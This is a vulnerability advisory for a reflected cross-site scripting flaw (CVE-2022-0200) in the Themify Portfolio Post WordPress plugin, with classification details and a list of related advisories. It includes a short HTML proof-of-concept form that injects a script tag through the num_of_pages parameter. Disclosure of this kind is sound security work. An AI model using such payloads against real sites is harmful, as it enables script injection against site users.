Themify Portfolio Post < 1.1.7 – Reflected Cross-Site Scripting | CVE 2022-0200 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the num_of_pages parameter before outputting it back the response of the themify_create_popup_page_pagination AJAX action (available to any authenticated user), leading to a Reflected Cross-Site Scripting

Proof of Concept

<html>
    <form action="https://example.com/wp-admin/admin-ajax.php?action=themify_create_popup_page_pagination" method="POST">
        <input type="text" name="current_page" value=3>
        <input type="text" name="num_of_pages" value='7"><script>alert(/XSS/);</script>'>
        <input type="submit" value="Send">
    </form>
</html>

Affects Plugins

themify-portfolio-post

Fixed in 1.1.7

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

bbc0b812-7b30-4ab4-bac8-27c706b3f146

Timeline

Publicly Published

2022-01-14 (about 3 years ago)

Added

2022-01-14 (about 3 years ago)

Last Updated

2022-04-12 (about 3 years ago)

Other

Published

Title

Published

2023-04-20

Title

CMS Tree Page View < 1.6.8 - Reflected XSS

Published

2025-08-25

Title

NextGEN Gallery Search <= 2.12 - Reflected Cross-Site Scripting

Published

2025-01-16

Title

CBX Accounting & Bookkeeping <= 1.3.14 - Reflected Cross-Site Scripting

Published

2025-01-30

Title

WPRadio – WordPress Radio Streaming Plugin < 1.0.5 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-02-11

Title

FuseDesk < 6.7 - Authenticated (Contributor+) Stored Cross-Site Scripting